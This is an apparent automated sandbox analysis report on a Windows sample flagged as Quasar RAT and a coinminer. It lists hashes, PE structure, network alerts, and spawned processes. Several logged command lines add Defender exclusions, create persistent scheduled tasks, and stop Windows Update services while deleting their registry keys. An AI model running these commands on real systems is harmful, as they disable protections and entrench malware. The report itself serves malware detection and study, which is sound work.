Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_m42dpnhz.s4a.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\dsarrsulkovb.sys

Download File

Process:	C:\ProgramData\mxergolzfguk\kaptsegthwf.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14544
Entropy (8bit):	6.2660301556221185
Encrypted:	false
SSDEEP:	192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
MD5:	0C0195C48B6B8582FA6F6373032118DA
SHA1:	D25340AE8E92A6D29F599FEF426A2BC1B5217299
SHA-256:	11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
SHA-512:	AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.\|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..\|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.511675116404577
TrID:	Win64 Executable GUI Net Framework (217006/5) 47.53% Win64 Executable GUI (202006/5) 44.25% Win64 Executable (generic) Net Framework (21505/4) 4.71% Win64 Executable (generic) (12005/4) 2.63% Generic Win/DOS Executable (2004/3) 0.44%
File name:	5fr5gthkjdg71.exe
File size:	6'332'216 bytes
MD5:	13b0dec8a2c9291ec13ca9d0f1a98b33
SHA1:	762c7072179bce1822999dc30c6252262caf6c00
SHA256:	210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba
SHA512:	b8b97a630c6f4eca602c756a5a1c29e1cc3354db29176a5b34cb92fd10b14665bde82d01f97c65fbdec3db343e20f6ec67a9e1d3db9c16c280f2e8962d144346
SSDEEP:	98304:j3GflC+i0bBHXGgjaQx+OhfzTxzdloaDU5BKtxo5fQIwuhkNUwZ:j3GtCj0bR2Ej1hbTxkfzKYAEkXZ
TLSH:	62561204B3D42EEDC12A6274D4615A71D2FAB80E2A778BBF0558D2771E23745CE39B23
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$.2.`.\.`.\.`.\..y..h.\..y....\..y..m.\.....b.\...X.r.\..._.j.\...Y.Y.\.i...i.\.i...b.\.i...g.\.`.].C.\...Y.R.\...\.a.\.....a.\

File Icon


Icon Hash:	1515d4d4442f2d2d

Static PE Info

General

Entrypoint:	0x140032e60
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x65DC537B [Mon Feb 26 09:01:47 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	2
File Version Major:	5
File Version Minor:	2
Subsystem Version Major:	5
Subsystem Version Minor:	2
Import Hash:	b1c5b1beabd90d9fdabd1df0779ea832

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007FC904B9A6F8h
dec eax
add esp, 28h
jmp 00007FC904B9A08Fh
int3
int3
dec eax
mov eax, esp
dec eax
mov dword ptr [eax+08h], ebx
dec eax
mov dword ptr [eax+10h], ebp
dec eax
mov dword ptr [eax+18h], esi
dec eax
mov dword ptr [eax+20h], edi
inc ecx
push esi
dec eax
sub esp, 20h
dec ebp
mov edx, dword ptr [ecx+38h]
dec eax
mov esi, edx
dec ebp
mov esi, eax
dec eax
mov ebp, ecx
dec ecx
mov edx, ecx
dec eax
mov ecx, esi
dec ecx
mov edi, ecx
inc ecx
mov ebx, dword ptr [edx]
dec eax
shl ebx, 04h
dec ecx
add ebx, edx
dec esp
lea eax, dword ptr [ebx+04h]
call 00007FC904B99513h
mov eax, dword ptr [ebp+04h]
and al, 66h
neg al
mov eax, 00000001h
sbb edx, edx
neg edx
add edx, eax
test dword ptr [ebx+04h], edx
je 00007FC904B9A223h
dec esp
mov ecx, edi
dec ebp
mov eax, esi
dec eax
mov edx, esi
dec eax
mov ecx, ebp
call 00007FC904B9C237h
dec eax
mov ebx, dword ptr [esp+30h]
dec eax
mov ebp, dword ptr [esp+38h]
dec eax
mov esi, dword ptr [esp+40h]
dec eax
mov edi, dword ptr [esp+48h]
dec eax
add esp, 20h
inc ecx
pop esi
ret
int3
int3
int3
dec eax
sub esp, 48h
dec eax
lea ecx, dword ptr [esp+20h]
call 00007FC904B88AA3h
dec eax
lea edx, dword ptr [000257C7h]
dec eax
lea ecx, dword ptr [esp+20h]
call 00007FC904B9B2F2h
int3
jmp 00007FC904BA14D4h
int3
int3
int3
int3
int3
int3

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x597a0	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x597d4	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x70000	0xe360	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x6a000	0x306c	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7f000	0x970	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x536c0	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x53780	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x4b3f0	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x48000	0x508	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x588bc	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x466ee	0x46800	27edb25a1bc32573014bf3adb5cecc24	False	0.536860039893617	data	6.469383562827248	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x48000	0x128c4	0x12a00	cde5f7a0fae18bcdb38da9f29d7f3313	False	0.449834836409396	data	5.269838116965451	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x5b000	0xe75c	0x1a00	0a420650d3abfc14c296cd4945b33a1d	False	0.28260216346153844	data	3.2569573130951395	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x6a000	0x306c	0x3200	95c27b680fbce994429e951f39e7a9ad	False	0.487734375	data	5.502914123440489	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.didat	0x6e000	0x360	0x400	53c09865fd6da5cc74254921d9575e3d	False	0.259765625	data	3.025278137091312	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
_RDATA	0x6f000	0x15c	0x200	58d3584c9c50f7594166c2ade479252f	False	0.40234375	data	3.307334517307356	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x70000	0xe360	0xe400	2ce7b064b562668bb9f9675200fd1906	False	0.6302425986842105	data	6.596823435141548	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x7f000	0x970	0xa00	77a9ddfc47a5650d6eebbcc823e39532	False	0.52421875	data	5.336289720085303	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
PNG	0x70680	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced	English	United States	1.0027729636048528
PNG	0x711c8	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced	English	United States	0.9363390441839495
RT_ICON	0x72778	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.47832369942196534
RT_ICON	0x72ce0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.5410649819494585
RT_ICON	0x73588	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.4933368869936034
RT_ICON	0x74430	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m	English	United States	0.5390070921985816
RT_ICON	0x74898	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m	English	United States	0.41393058161350843
RT_ICON	0x75940	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m	English	United States	0.3479253112033195
RT_ICON	0x77ee8	0x3d71	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9809269502193401
RT_DIALOG	0x7c5b8	0x286	data	English	United States	0.5092879256965944
RT_DIALOG	0x7c388	0x13a	data	English	United States	0.60828025477707
RT_DIALOG	0x7c4c8	0xec	data	English	United States	0.6991525423728814
RT_DIALOG	0x7c258	0x12e	data	English	United States	0.5927152317880795
RT_DIALOG	0x7bf20	0x338	data	English	United States	0.45145631067961167
RT_DIALOG	0x7bcc8	0x252	data	English	United States	0.5757575757575758
RT_STRING	0x7cf98	0x1e2	data	English	United States	0.3900414937759336
RT_STRING	0x7d180	0x1cc	data	English	United States	0.4282608695652174
RT_STRING	0x7d350	0x1b8	data	English	United States	0.45681818181818185
RT_STRING	0x7d508	0x146	data	English	United States	0.5153374233128835
RT_STRING	0x7d650	0x46c	data	English	United States	0.3454063604240283
RT_STRING	0x7dac0	0x166	data	English	United States	0.49162011173184356
RT_STRING	0x7dc28	0x152	data	English	United States	0.5059171597633136
RT_STRING	0x7dd80	0x10a	data	English	United States	0.49624060150375937
RT_STRING	0x7de90	0xbc	data	English	United States	0.6329787234042553
RT_STRING	0x7df50	0x1c0	data	English	United States	0.5178571428571429
RT_STRING	0x7e110	0x250	data	English	United States	0.44256756756756754
RT_GROUP_ICON	0x7bc60	0x68	data	English	United States	0.7019230769230769
RT_MANIFEST	0x7c840	0x753	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.39786666666666665

Imports

DLL	Import
KERNEL32.dll	LocalFree, GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, CreateDirectoryW, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetModuleFileNameW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExpandEnvironmentStringsW, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, GlobalMemoryStatusEx, LoadResource, SizeofResource, GetTimeFormatW, GetDateFormatW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, IsValidCodePage, FindNextFileA, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, InitializeCriticalSectionAndSpinCount, WaitForSingleObjectEx, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlPcToFileHeader, RtlUnwindEx, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, GetStringTypeW, HeapReAlloc, LCMapStringW, FindFirstFileExA
OLEAUT32.dll	SysAllocString, SysFreeString, VariantClear
gdiplus.dll	GdipCloneImage, GdipFree, GdipDisposeImage, GdipCreateBitmapFromStream, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipAlloc

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-02T09:58:00.964292+0100	2017871	ET COINMINER W32/BitCoinMiner.MultiThreat Subscribe/Authorize Stratum Protocol Message	2	192.168.2.4	49738	31.220.102.19	3333	TCP
2025-01-02T09:58:34.299221+0100	2017871	ET COINMINER W32/BitCoinMiner.MultiThreat Subscribe/Authorize Stratum Protocol Message	2	192.168.2.4	49738	31.220.102.19	3333	TCP
2025-01-02T09:58:34.299494+0100	2017871	ET COINMINER W32/BitCoinMiner.MultiThreat Subscribe/Authorize Stratum Protocol Message	2	192.168.2.4	49738	31.220.102.19	3333	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 2, 2025 09:58:06.076306105 CET	49730	4000	192.168.2.4	185.148.3.216
Jan 2, 2025 09:58:06.081125021 CET	4000	49730	185.148.3.216	192.168.2.4
Jan 2, 2025 09:58:06.081216097 CET	49730	4000	192.168.2.4	185.148.3.216
Jan 2, 2025 09:58:06.095686913 CET	49730	4000	192.168.2.4	185.148.3.216
Jan 2, 2025 09:58:06.100508928 CET	4000	49730	185.148.3.216	192.168.2.4
Jan 2, 2025 09:58:07.767581940 CET	4000	49730	185.148.3.216	192.168.2.4
Jan 2, 2025 09:58:07.767764091 CET	49730	4000	192.168.2.4	185.148.3.216
Jan 2, 2025 09:58:07.780662060 CET	49730	4000	192.168.2.4	185.148.3.216
Jan 2, 2025 09:58:07.785422087 CET	4000	49730	185.148.3.216	192.168.2.4
Jan 2, 2025 09:58:11.282919884 CET	49731	4000	192.168.2.4	185.148.3.216
Jan 2, 2025 09:58:11.287765980 CET	4000	49731	185.148.3.216	192.168.2.4
Jan 2, 2025 09:58:11.289438009 CET	49731	4000	192.168.2.4	185.148.3.216
Jan 2, 2025 09:58:11.289845943 CET	49731	4000	192.168.2.4	185.148.3.216
Jan 2, 2025 09:58:11.294699907 CET	4000	49731	185.148.3.216	192.168.2.4
Jan 2, 2025 09:58:12.971055984 CET	4000	49731	185.148.3.216	192.168.2.4
Jan 2, 2025 09:58:12.971226931 CET	49731	4000	192.168.2.4	185.148.3.216
Jan 2, 2025 09:58:12.971546888 CET	49731	4000	192.168.2.4	185.148.3.216
Jan 2, 2025 09:58:12.976315975 CET	4000	49731	185.148.3.216	192.168.2.4

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 2, 2025 09:58:15.951625109 CET	1.1.1.1	192.168.2.4	0xab53	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Jan 2, 2025 09:58:15.951625109 CET	1.1.1.1	192.168.2.4	0xab53	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	03:57:58
Start date:	02/01/2025
Path:	C:\Users\user\Desktop\5fr5gthkjdg71.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\5fr5gthkjdg71.exe"
Imagebase:	0x7ff731c70000
File size:	6'332'216 bytes
MD5 hash:	13B0DEC8A2C9291EC13CA9D0F1A98B33
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000000.00000003.1687810201.00000209BA177000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	03:57:59
Start date:	02/01/2025
Path:	C:\Users\user\Desktop\gfiKDLgr58thy4d.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\gfiKDLgr58thy4d.exe"
Imagebase:	0x7ff6880c0000
File size:	2'874'368 bytes
MD5 hash:	952F360A4651F948BE3A673178631641
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 92%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:57:59
Start date:	02/01/2025
Path:	C:\Users\user\Desktop\GR55Qg1hth.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\GR55Qg1hth.exe"
Imagebase:	0x7ff650220000
File size:	2'479'616 bytes
MD5 hash:	8E40252356A6FB3F8F52D1EFFA2C2C3C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 96%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	03:57:59
Start date:	02/01/2025
Path:	C:\Users\user\Desktop\F4R5fd8grr.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\F4R5fd8grr.exe"
Imagebase:	0xe70000
File size:	514'048 bytes
MD5 hash:	EA001F076677C9B0DD774AE670EFDF63
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000003.00000000.1691589701.0000000000EF0000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000003.00000000.1690944471.0000000000E72000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: C:\Users\user\Desktop\F4R5fd8grr.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\Desktop\F4R5fd8grr.exe, Author: Joe Security Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: C:\Users\user\Desktop\F4R5fd8grr.exe, Author: Florian Roth Rule: Vermin_Keylogger_Jan18_1, Description: Detects Vermin Keylogger, Source: C:\Users\user\Desktop\F4R5fd8grr.exe, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: C:\Users\user\Desktop\F4R5fd8grr.exe, Author: ditekSHen Rule: MALWARE_Win_QuasarStealer, Description: Detects Quasar infostealer, Source: C:\Users\user\Desktop\F4R5fd8grr.exe, Author: ditekshen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 96%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	03:57:59
Start date:	02/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	03:57:59
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	03:57:59
Start date:	02/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	03:57:59
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	03:58:02
Start date:	02/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	"schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\user\Desktop\F4R5fd8grr.exe" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	03:58:02
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	03:58:02
Start date:	02/01/2025
Path:	C:\Users\user\AppData\Roaming\SubDir\Client.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\SubDir\Client.exe"
Imagebase:	0x420000
File size:	514'048 bytes
MD5 hash:	EA001F076677C9B0DD774AE670EFDF63
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, Author: Joe Security Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, Author: Florian Roth Rule: Vermin_Keylogger_Jan18_1, Description: Detects Vermin Keylogger, Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, Author: ditekSHen Rule: MALWARE_Win_QuasarStealer, Description: Detects Quasar infostealer, Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, Author: ditekshen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 96%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	03:58:04
Start date:	02/01/2025
Path:	C:\Users\user\Desktop\F4R5fd8grr.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\F4R5fd8grr.exe
Imagebase:	0x510000
File size:	514'048 bytes
MD5 hash:	EA001F076677C9B0DD774AE670EFDF63
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	03:58:04
Start date:	02/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	"schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	03:58:04
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	03:58:06
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Imagebase:	0x7ff679ad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	03:58:06
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Imagebase:	0x7ff679ad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	03:58:06
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	03:58:06
